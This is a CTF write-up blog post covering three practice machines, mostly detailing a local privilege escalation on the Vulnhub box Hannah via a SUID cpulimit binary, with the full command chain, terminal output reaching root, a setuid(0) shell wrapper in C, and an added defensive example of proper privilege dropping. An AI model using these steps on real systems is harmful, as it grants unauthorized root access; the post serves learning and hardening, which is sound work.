Introduction

I’ve recently completed NULLY CYBERSECURITY: 1 and ONSYSTEM: SHELLDREDD #1 HANNAH from Vulnhub and Poster from TryHackMe. These are some brief thoughts about each one.

Nully

This was great; I really enjoyed it. I will probably write it up separately. But essentially it’s three separate servers/services (Mail, Web and DB) and you pivot to the Web and DB after you’ve pwned the Mail server - I did that with SSH port forwarding for the Web server. Definitely worth checking out.

Poster

This was an easy THM room; essentially it’s default creds on a web-facing PostgreSQL installation, which allows for RCE (and a shell) via Metasploit. The privesc is finding some creds in a PHP config file; pretty simple.

Hannah

The foothold was an SSH private key sitting on an FTP server that allowed anonymous login; trivial. The privesc was via /usr/bin/cpulimit with the SUID bit set. GTFOBins doesn’t show a SUID method for this binary; here are two I found:

cd /tmp  
# cpulimit is SUID root and runs the -f command without dropping privileges, so each of these runs as root  
cpulimit -l 100 -f mkdir /something  
cpulimit -l 100 -f chmod 4755 /usr/bin/bash  
cpulimit -l 100 -f cp /usr/bin/bash /something  
cpulimit -l 100 -f chmod +s /something/bash  
cd /something  
# -p stops bash resetting its effective uid to the real uid  
./bash -p  

This is making a root-owned, SUID copy of bash. It works because cpulimit, being SUID root, forks and execs whatever follows -f without dropping its effective uid of 0, so every command in the chain runs as root: the copy made by cp is owned by root, the chmod +s makes it SUID, and -p is needed at the end because bash otherwise resets its effective uid to the real uid. (The chmod 4755 /usr/bin/bash step on its own already makes the system bash SUID root, so /usr/bin/bash -p would also have worked.) Similar techniques are shown for other SUID binaries on GTFOBins, just not for this one.

In practice, it looks like this:

hannah@ShellDredd:~/.ssh$ cd /tmp  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f mkdir /something  
Process 17132 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f chmod 4755 /usr/bin/bash  
Process 17134 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f cp /usr/bin/bash /something  
Process 17136 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f chmod +s /something/bash  
Process 17138 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cd /something  
hannah@ShellDredd:/something$ ./bash -p  
bash-5.0# whoami  
root  

The second method is making a small setuid(0) wrapper of our own and then running it via cpulimit. The wrapper itself does not need the SUID bit: cpulimit already starts it with an effective uid of 0, and the setuid(0) call turns that into a real uid of 0 as well, so the bash it spawns does not drop privileges (without that call bash would see real uid hannah, effective uid root, and reset the latter). The binary looks like this:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
	/* cpulimit starts us with euid 0; make the real uid/gid root too so
	 * the shell below does not drop privileges. */
	if (setuid(0) != 0 || setgid(0) != 0) {
		perror("setuid/setgid");
		return 1;
	}
	system("/bin/bash");
	return 0;
}

There are other variants of this code, but it’s essentially setuid to zero and call bash (or a reverse shell). There is no compiler on the box, so you have to compile it on your attack machine and upload the binary (gcc -static avoids a glibc mismatch on the target). Then you can run:

hannah@ShellDredd:~/.ssh$ cpulimit -l 95 -f ./shell

Apart from this slightly different SUID binary, it’s fairly simple.
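To make the mechanism behind both methods concrete, here is an added example of my own; it is illustrative code, not cpulimit’s source and not anything from the box. It is a stand-in for an SUID helper that launches a command on the user’s behalf. launch(argv, 0) reproduces what cpulimit -f appears to do, handing the helper’s effective uid straight to the child; launch(argv, 1) is the hardened form, which drops to the invoking user’s real uid/gid and verifies the drop before exec. child_euid() reports the effective uid a child ends up with under each policy. Run as an ordinary user both come back the same; installed SUID root, the undropped variant would report 0, which is exactly the gap exploited above. That cpulimit merely forks and execs without dropping privileges is inferred from the behaviour shown in the transcript, not from reading its source.

```c
/* suid_launch.c: illustrative stand-in for an SUID helper that runs a
 * command for the user (as cpulimit -f does).  Assumption: the real
 * cpulimit simply fork()s and exec()s; this is not its source. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop to the invoking user's real uid/gid.  Returns 0 on
 * success, -1 if anything is still privileged afterwards. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: once the uid is dropped, setgid() would fail. */
    if (setgid(rgid) != 0)
        return -1;
    /* With euid 0, setuid() sets real, effective and saved uid at once. */
    if (setuid(ruid) != 0)
        return -1;
    /* Verify the drop took effect on every id we can observe. */
    if (getuid() != ruid || geteuid() != ruid ||
        getgid() != rgid || getegid() != rgid)
        return -1;
    /* A non-root caller must not be able to climb back to root. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Fork, optionally drop privileges, and exec argv.  Returns the child's
 * exit status, or -1 on error.  With drop_privs == 0 this is the cpulimit
 * behaviour: an SUID-root helper hands euid 0 straight to the child. */
int launch(char *const argv[], int drop_privs)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privs && drop_privileges() != 0)
            _exit(126);
        execvp(argv[0], argv);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Report the effective uid a child would run with under each policy, by
 * forking, optionally dropping, and passing geteuid() back over a pipe. */
uid_t child_euid(int drop_privs)
{
    int fd[2];
    if (pipe(fd) != 0)
        return (uid_t)-1;
    pid_t pid = fork();
    if (pid < 0)
        return (uid_t)-1;
    if (pid == 0) {
        close(fd[0]);
        if (drop_privs && drop_privileges() != 0)
            _exit(126);
        uid_t e = geteuid();
        if (write(fd[1], &e, sizeof e) != (ssize_t)sizeof e)
            _exit(1);
        _exit(0);
    }
    close(fd[1]);
    uid_t e = (uid_t)-1;
    ssize_t n = read(fd[0], &e, sizeof e);
    close(fd[0]);
    waitpid(pid, NULL, 0);
    return n == (ssize_t)sizeof e ? e : (uid_t)-1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    printf("child euid without drop: %u, with drop: %u\n",
           (unsigned)child_euid(0), (unsigned)child_euid(1));
    return launch(argv + 1, 1);
}
```

If you chown root and chmod 4755 this binary yourself (on a throwaway VM), the first number printed becomes 0 and the second stays your own uid; that difference is the whole privesc. The order inside drop_privileges matters: gid before uid, then a check that setuid(0) now fails, because a silently failed drop is how helpers like this end up on GTFOBins.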